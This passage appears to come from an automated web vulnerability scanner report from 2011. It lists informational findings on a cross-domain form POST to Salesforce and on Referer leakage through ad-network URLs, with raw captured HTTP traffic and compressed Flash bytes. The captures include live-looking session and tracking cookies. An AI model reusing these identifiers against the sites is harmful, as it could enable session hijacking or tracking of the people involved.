Request 1

GET /v/BXKQ0elgHdY?fs=1&hl=en_US&rel=0&hd=1 HTTP/1.1
Host: www.youtube.com
Proxy-Connection: keep-alive
Referer: http://websiteoptimizer.blogspot.com/?utm_source=gwohp&utm_medium=et&utm_campaign=promobox
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VISITOR_INFO1_LIVE=q3x9cOh74FU; PREF=fv=10.2.154

Response 1

HTTP/1.1 200 OK
Date: Sat, 09 Apr 2011 00:17:51 GMT
Server: Apache
X-Content-Type-Options: nosniff
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Length: 1041
Content-Type: application/x-shockwave-flash

CWS.I...x.}U.s.D._.r$;.mM.    8i........B..N.........#Yg..}Ew....}..gx.....[f.N.]J..W......i.+........5....y.`..@<..6q........q..[S.y..5......t_tP..MbT.8..W.#b3.I.q...H\...eQ.+...>L..ea....;
..m...C..p).,?....Gq..v8V......@...o*...J.!.........}..Z..;.o%...F......!a."..#....Q...@'..&...^.........z\..[./0...~..|..w{O.....s~6..x.......r.......wa.j.l6{...6.nl mu.-.wf..Uz.$..`.a...z.2s.R]..B.....C>......-....z.........$.R"-s.)...,..Y.gcR..e{..Y....=...9..Lu.2...}.G..Z...`.n...3......p.I ......pH.UD.5!.,...Z...h.X.Q..!)..K..1...C..>.!`...*pD.......]qR.U.. .t:...0z.Y....&...?5.++.LY..L...M$..h.S.t0..
......2.X....zvz.L.....&.9.......!.M..Bh%.VF.bM.d.......|C.B...n.d....I....a.H+.v.)!...90..j,D.m1...R.B.E.W....`.tM...^8
..(.l......V.%|..6.....KS|G.....~=.K.......v..`....Y.4..YR.....Q...|;]5....p....e...*>...,B7.........b~..w2"m...[".!..~..|_.7...;F..<.;..d-.......o...........m..?4.u.e..vd..?QKu..}..r~..m5m.g.h.W.5?.|A...j,....Y..k...~E...g.!.._...!...q.N..tj...z......Q^.r....}6....b......
_)=t&............Op....r.G....0.r.?D$..

Request 2

GET /v/BXKQ0elgHdY?fs=1&hl=en_US&rel=0&hd=1 HTTP/1.1
Host: www.youtube.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VISITOR_INFO1_LIVE=q3x9cOh74FU; PREF=fv=10.2.154

Response 2

HTTP/1.1 200 OK
Date: Sat, 09 Apr 2011 00:18:13 GMT
Server: Apache
X-Content-Type-Options: nosniff
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Length: 981
Content-Type: application/x-shockwave-flash

CWS.....x.}U]s.D.=..Hv>..R....(...*..B.J.....v...}....V"K.$;./.Oy....[x..2ww......j...g..]O...(........G......<..v..0....zl.RH).i.._.r...@...%..(........\a.$Ix...........`h.].._yr.y.G.o....z..K..a.rM`.:,h....H..@|.[..+..."W...n...........2./..S..P=.=.?....G........$p..../No...........J.(...u.j.nl.l...{f.Y\....V..-=K......0...^..=.Q...4d..../......
.1;aG.0...c.    .b..bY..q*..u.(5..x.4.C.....x.6IX.S.......gw....z<.v.......pX.D..#....h..`..,B...HPp...U.w.B.zn".!d|.+....\.a.z.b..6..4"....p.>...X.....V.%.(..zv?F..@.P.S._*W2Ea.0..V.I.N....4.J...)....v..{.-...U....I....m..=.`.#....PLn.N.b....C|..'W.2_}..mC......l
.U...9ce.u.q..f..d.-U.M5..
..QmI.j.y_...)".".<....%.i....6g......t5.Y
oY.[.Q..g.....zs.o.k.Wbn...f..a..\....I^M.N. =+&.5.....<........m.)2.y...\3>....^..v../..R;.....|.y9.c
..c.K...........-....Zn.,J...H.C.....e...2.'k......V......[..1..u..O.:/.;.r,.....H..C..."w.h.y.n.`...!-_...;yz...O..5$.7.|..C(./....>...P.Y.i.....R....    .....%g.Q.&S....=...a `).~...W!lb
9. Cross-domain POST  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://valtira.com
Path:   /page/1/valtira-contact-od.jsp

Issue detail

The page contains a form which POSTs data to the domain www.salesforce.com. The form contains the following fields:

Issue background

The POSTing of data between domains does not necessarily constitute a security vulnerability. You should review the contents of the information that is being transmitted between domains, and determine whether the originating application should be trusting the receiving domain with this information.

Request

GET /page/1/valtira-contact-od.jsp HTTP/1.1
Host: valtira.com
Proxy-Connection: keep-alive
Referer: http://valtira.com/page/1/valtira-Marketing-Tools.jsp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VLTSID=rHTkRVaEF2pqO; JSESSIONID=3C47A68301185EB621E479EA2B81A26C.valtira-com-2; __utmz=152738878.1302308422.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); VLTALT=325428#valtira.com; __utma=152738878.105465705.1302308422.1302308422.1302308422.1; __utmc=152738878; __utmb=152738878.2.10.1302308422

Response

HTTP/1.1 200 OK
Date: Sat, 09 Apr 2011 00:21:39 GMT
Server: Apache
Set-Cookie: VLTALT=325428#valtira.com; Domain=valtira.com; Expires=Tue, 06-Apr-2021 00:21:39 GMT; Path=/
Cache-Control: private,no-cache,no-store,must-revalidate
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 8087


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en
...[SNIP]...
</p>


<form name="contact" id="publicForm" method="post" action="https://www.salesforce.com/servlet/servlet.WebToLead?encoding=UTF-8">


<input type="hidden" name="campaign" value="Google Website Optimizer (1101)"/>
...[SNIP]...
10. Cross-domain Referer leakage  previous  next
There are 207 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.

10.1. http://a.rfihub.com/sed  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.rfihub.com
Path:   /sed

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /sed?w=300&h=250&re=12387&pv=0&ra=3525255080.7230796942021698&rb=445&ca=&rc=10.2&rd=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%253Fsa%253Dl%2526ai%253DBKgktkFKgTfjNO6X6lAfi7omAC6-TxYsCj9qbsyK3zOLcHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi0yMTAzNTUzODUzMDgyNjAzoAGz7MfrA7IBDHd3dy53Y2F4LmNvbboBCjMwMHgyNTBfYXPIAQnaAS9odHRwOi8vd3d3LndjYXguY29tL0dsb2JhbC9jYXRlZ29yeS5hc3A_Qz0xODgzNpgC8hHAAgTIAs3vzw6oAwHoAxDoA9Qq6APnAvUDAAAARPUDIAAAAIAGo6es8NStl8O_AQ%2526num%253D1%2526sig%253DAGiWqtwsnfDOzRnIRJLXiZuNn2CCD9KiLg%2526client%253Dca-pub-2103553853082603%2526adurl%253D&ua=&ub=&uc=&ud=&ue=&pa=ppre352525508247&pb=&pc=&pd=&pg=&ct=1302352525508&co=false&ep=TaBSkAAO5vgK5T0lsAJ3YlpV74vOvScCMvR4kw&ri=4da052900ee6f8ae53d25b0277621&rs=&ai=9530&rt=10261&pe=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Fpagead%2Fads%3Fclient%3Dca-pub-2103553853082603%26output%3Dhtml%26h%3D250%26slotname%3D8163847123%26w%3D300%26lmt%3D1302370522%26flash%3D10.2.154%26url%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fcategory.asp%253FC%253D18836%26dt%3D1302352522769%26bpp%3D3%26shv%3Dr20110330%26jsv%3Dr20110321-2%26correlator%3D1302352522793%26frm%3D0%26adk%3D2815960337%26ga_vid%3D983270927.1302352523%26ga_sid%3D1302352523%26ga_hid%3D1867116075%26ga_fc%3D0%26u_tz%3D-300%26u_his%3D3%26u_java%3D1%26u_h%3D1200%26u_w%3D1920%26u_ah%3D1156%26u_aw%3D1920%26u_cd%3D16%26u_nplug%3D9%26u_nmime%3D44%26biw%3D1063%26bih%3D1038%26ref%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fcategory.asp%253FC%253D18963%26fu%3D0%26ifi%3D1%26dtd%3D103%26xpc%3DmxzeQN3016%26p%3Dhttp%253A%2F%2Fwww.wcax.com&pf= HTTP/1.1
Host: a.rfihub.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-2103553853082603&output=html&h=250&slotname=8163847123&w=300&lmt=1302370522&flash=10.2.154&url=http%3A%2F%2Fwww.wcax.com%2FGlobal%2Fcategory.asp%3FC%3D18836&dt=1302352522769&bpp=3&shv=r20110330&jsv=r20110321-2&correlator=1302352522793&frm=0&adk=2815960337&ga_vid=983270927.1302352523&ga_sid=1302352523&ga_hid=1867116075&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1063&bih=1038&ref=http%3A%2F%2Fwww.wcax.com%2FGlobal%2Fcategory.asp%3FC%3D18963&fu=0&ifi=1&dtd=103&xpc=mxzeQN3016&p=http%3A//www.wcax.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: g="aABMFwoTA==A-aAcXzUJ2ZpCiN|9530|84152|361230|12352|824|99188|445|38387|6613AAABLzpCh6o=";Path=/;Domain=.rfihub.com;Expires=Mon, 08-Oct-12 12:35:29 GMT
Set-Cookie: u="aABnActyg==AI89bBrQ==AAABLzpCh6k=";Path=/;Domain=.rfihub.com;Expires=Mon, 08-Oct-12 12:35:29 GMT
Set-Cookie: f="aABnVZ4PA==AK1302352529AB1AAABLzpCh6g=";Path=/;Domain=.rfihub.com;Expires=Mon, 08-Oct-12 12:35:29 GMT
Set-Cookie: s="aACqCxNPw==AE9479AN1294103956000AAABLzpCh6g=AE8438AN1275963655000AAABLzpCh6g=";Path=/;Domain=.rfihub.com;Expires=Mon, 08-Oct-12 12:35:29 GMT
Cache-Control: no-cache
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: e=cd;Path=/;Domain=.rfihub.com;Expires=Mon, 08-Oct-12 12:35:29 GMT
Set-Cookie: a=c369576644441445542;Path=/;Domain=.rfihub.com;Expires=Fri, 04-Apr-31 12:35:29 GMT
Set-Cookie: j=c369576644441445542;Path=/;Domain=.rfihub.com
Set-Cookie: o=1-qI823taMvmm8;Path=/;Domain=.rfihub.com;Expires=Fri, 04-Apr-31 12:35:29 GMT
Set-Cookie: p=1-qI823taMvmm8;Path=/;Domain=.rfihub.com
Set-Cookie: r=1302352529321;Path=/;Domain=.rfihub.com;Expires=Fri, 04-Apr-31 12:35:29 GMT
Content-Length: 2760

<html><body><span id="__rfi" style="height:0px; width:0px"><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N763.rocketfuelincOX15601/B4639841.2;sz=300x250;ord=1302352529320;click=http://a.rfihub.com/acs/123_1_YWE9OTUzMCw4NDE1MiwxMjM1MiwzNjEyMzAsODI0LDEwMjYxLEFjWHpVSjJacENpTixwLDQ5MiwxMjQ5LDM4Mzg3LDEyNzksNjYxMyZyYj00NDUmcmU9MTIzODcX">
</SCRIPT>
...[SNIP]...
MiwzNjEyMzAsODI0LDEwMjYxLEFjWHpVSjJacENpTixwLDQ5MiwxMjQ5LDM4Mzg3LDEyNzksNjYxMyZyYj00NDUmcmU9MTIzODcXhttp://ad.doubleclick.net/jump/N763.rocketfuelincOX15601/B4639841.2;sz=300x250;ord=1302352529320?">
<IMG SRC="http://ad.doubleclick.net/ad/N763.rocketfuelincOX15601/B4639841.2;sz=300x250;ord=1302352529320?" BORDER=0 WIDTH=300 HEIGHT=250 ALT="Click Here"></A>
...[SNIP]...
<noscript><img style="margin:0;padding:0;" border="0" width="1" height="1" src="http://l.betrad.com/ct/0_0_0_0_0_624/pixel.gif?e=100&v=noscript"/></noscript>
...[SNIP]...
</noscript><img src="http://secure-us.imrworldwide.com/cgi-bin/m?ci=us-rocketfuel&cg=369576644441445542&cc=1" width="1" height="1" border="0" alt=""><script src="http://b.scorecardresearch.com/beacon.js?c1=8&c2=6820648&c3=1&c4=&c5=&c6="></script>
<noscript><img src="http://b.scorecardresearch.com/p?c1=8&c2=6820648&c3=1&c4=&c5=&c6=&cj=1&rn=1302352529320" /></noscript><img src="http://cm.g.doubleclick.net/pixel?nid=rfi&forward=" width="1" height="1" /><img src="http://ib.adnxs.com/pxj?bidder=18&action=setuids('369576644441445542','');&redir=http%3A%2F%2Fib.adnxs.com%2Fgetuidu%3Fhttp%3A%2F%2Fa.rfihub.com%2Fcm%3Fapxuid%3D%24UID%26forward%3D" width="1" height="1">
</body>
...[SNIP]...
10.2. http://ad.doubleclick.net/adi/fnc/root/stocksearch  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/fnc/root/stocksearch

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adi/fnc/root/stocksearch;pos=stocksearch;fnc=ad;sz=88x31;ord=781297988? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.foxnews.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 940
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 11 Apr 2011 16:21:06 GMT
Expires: Mon, 11 Apr 2011 16:21:06 GMT
Discarded: true

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><script type="text/javascript" src="http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/779.0.js.88x31/517745?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3ae6/3/0/%2a/b%3B233906192%3B0-0%3B1%3B22676449%3B21-88/31%3B34860823/34878678/1%3B%3B%7Eokv%3D%3Bpos%3Dstocksearch%3Bfnc%3Dad%3Bsz%3D88x31%3B%7Eaopt%3D2/1/8b/0%3B%7Esscs%3D%3f"></script>
...[SNIP]...
23/34878678/1%3B%3B%7Eokv%3D%3Bpos%3Dstocksearch%3Bfnc%3Dad%3Bsz%3D88x31%3B%7Eaopt%3D2/1/8b/0%3B%7Esscs%3D%3fhttp://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/779.0.img.88x31/" target="_blank"><img src="http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/779.0.img.88x31/517745" /></a>
...[SNIP]...
10.3. http://ad.doubleclick.net/adi/wn.loc.wcax/community  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/wn.loc.wcax/community

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adi/wn.loc.wcax/community;sz=468x60;wnsz=1;tile=7;wncc=Community;wnpt=C;wnpc=category;wncp=WCAX;wncid=18836;wnad85=wcax;wnad44=wcax;wnad46=wcax;wnad43=wcax;wnad52=wcax;wnad22=wcax;wnad1=wcax;wnad35=wcax;wnad49=wcax;apptype=platform;env=production;ord=7883512? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/category.asp?C=18836
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 09 Apr 2011 12:39:57 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 677

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template ID = 6770 Template Name = +WorldNow Image with C
...[SNIP]...
41025837/41043624/1%3B%3B%7Esscs%3D%3fhttp://www.ford.heritagevt.com/new-inventory/index.htm?utm_campaign=wcax_03-2011&utm_medium=banner&utm_source=wcax&utm_content=468x60_newfords_hf" target="_blank"><img border="0" src="http://s0.2mdn.net/2773093/wcax_468x60_newfords.jpg?adID=237702285" WIDTH="468" HEIGHT="60" alt="" title=""></a>
...[SNIP]...
10.4. http://ad.doubleclick.net/adi/wn.loc.wcax/community  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/wn.loc.wcax/community

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adi/wn.loc.wcax/community;sz=468x60;wnsz=1;tile=7;wncc=Community;wnpt=C;wnpc=category;wncp=WCAX;wncid=18836;wnad85=wcax;wnad44=wcax;wnad46=wcax;wnad43=wcax;wnad52=wcax;wnad22=wcax;wnad1=wcax;wnad35=wcax;wnad49=wcax;apptype=platform;env=production;ord=49374599? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/category.asp?C=18836
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 09 Apr 2011 12:34:08 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 2642

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 6959 Template Name = +WorldNow Flash Banner
...[SNIP]...
<!-- Copyright 2002 DoubleClick Inc., All rights reserved. --><script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
10.5. http://ad.doubleclick.net/adi/wn.loc.wcax/community  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/wn.loc.wcax/community

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adi/wn.loc.wcax/community;sz=728x90;wnsz=46;tile=3;wncc=Community;wnpt=C;wnpc=category;wncp=WCAX;wncid=18836;wnad85=wcax;wnad44=wcax;wnad46=wcax;wnad43=wcax;wnad52=wcax;wnad22=wcax;wnad1=wcax;wnad35=wcax;wnad49=wcax;apptype=platform;env=production;ord=80658097? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/category.asp?C=18836
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 09 Apr 2011 12:35:28 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 581

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 6770 Template Name = +WorldNow Image with C
...[SNIP]...
href="http://ad.doubleclick.net/click%3Bh%3Dv8/3ae4/3/0/%2a/g%3B213798313%3B0-0%3B0%3B29116597%3B3454-728/90%3B30975772/30993648/1%3B%3B%7Esscs%3D%3fhttp://www.vermontorthoclinic.org/" target="_blank"><img border="0" src="http://WCAX.images.worldnow.com/ads/134905_AM.gif?adID=213798313" WIDTH="728" HEIGHT="90" alt="RRMC VOC" title="RRMC VOC"></a>
...[SNIP]...
10.6. http://ad.doubleclick.net/adi/wn.loc.wcax/community  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/wn.loc.wcax/community

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adi/wn.loc.wcax/community;sz=728x90;wnsz=46;tile=3;wncc=Community;wnpt=C;wnpc=category;wncp=WCAX;wncid=18836;wnad85=wcax;wnad44=wcax;wnad46=wcax;wnad43=wcax;wnad52=wcax;wnad22=wcax;wnad1=wcax;wnad35=wcax;wnad49=wcax;apptype=platform;env=production;ord=49374599? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/category.asp?C=18836
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 09 Apr 2011 12:34:08 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 574

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template ID = 6770 Template Name = +WorldNow Image with C
...[SNIP]...
ttp://ad.doubleclick.net/click%3Bh%3Dv8/3ae4/3/0/%2a/h%3B231063796%3B0-0%3B0%3B29116597%3B3454-728/90%3B38856387/38874144/1%3B%3B%7Esscs%3D%3fhttp://www.funeralplan2.com/readyfuneral/" target="_blank"><img border="0" src="http://WCAX.images.worldnow.com/ads/178602_AM.jpg?adID=231063796" WIDTH="728" HEIGHT="90" alt="" title=""></a>
...[SNIP]...
10.7. http://ad.doubleclick.net/adi/wn.loc.wcax/community  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/wn.loc.wcax/community

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adi/wn.loc.wcax/community;sz=300x250;wnsz=43;tile=4;wncc=Community;wnpt=C;wnpc=category;wncp=WCAX;wncid=18836;wnad85=wcax;wnad44=wcax;wnad46=wcax;wnad43=wcax;wnad52=wcax;wnad22=wcax;wnad1=wcax;wnad35=wcax;wnad49=wcax;apptype=platform;env=production;ord=49374599? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/category.asp?C=18836
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 09 Apr 2011 12:34:08 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 566

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template ID = 6770 Template Name = +WorldNow Image with C
...[SNIP]...
="http://ad.doubleclick.net/click%3Bh%3Dv8/3ae4/3/0/%2a/h%3B237510414%3B0-0%3B0%3B29116597%3B4307-300/250%3B40973307/40991094/1%3B%3B%7Esscs%3D%3fhttp://www.vermontcoinandjewelry.com/" target="_blank"><img border="0" src="http://s0.2mdn.net/3103254/vtcoin-cube2.jpg?adID=237510414" WIDTH="300" HEIGHT="250" alt="" title=""></a>
...[SNIP]...
10.8. http://ad.doubleclick.net/adi/wn.loc.wcax/community  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/wn.loc.wcax/community

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adi/wn.loc.wcax/community;sz=300x250;wnsz=43;tile=4;wncc=Community;wnpt=C;wnpc=category;wncp=WCAX;wncid=18836;wnad85=wcax;wnad44=wcax;wnad46=wcax;wnad43=wcax;wnad52=wcax;wnad22=wcax;wnad1=wcax;wnad35=wcax;wnad49=wcax;apptype=platform;env=production;ord=7883512? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/category.asp?C=18836
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 09 Apr 2011 12:39:57 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 624

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template ID = 6770 Template Name = +WorldNow Image with C
...[SNIP]...
%2a/g%3B234572744%3B0-0%3B0%3B29116597%3B4307-300/250%3B40072325/40090112/1%3B%3B%7Esscs%3D%3fhttp://www.champlain.edu/Graduate-Studies/Programs/Master-of-Business-Administration.html" target="_blank"><img border="0" src="http://WCAX.images.worldnow.com/ads/186074_AM.jpg?adID=234572744" WIDTH="300" HEIGHT="250" alt="" title=""></a>
...[SNIP]...
10.9. http://ad.doubleclick.net/adi/wn.loc.wcax/community  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/wn.loc.wcax/community

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

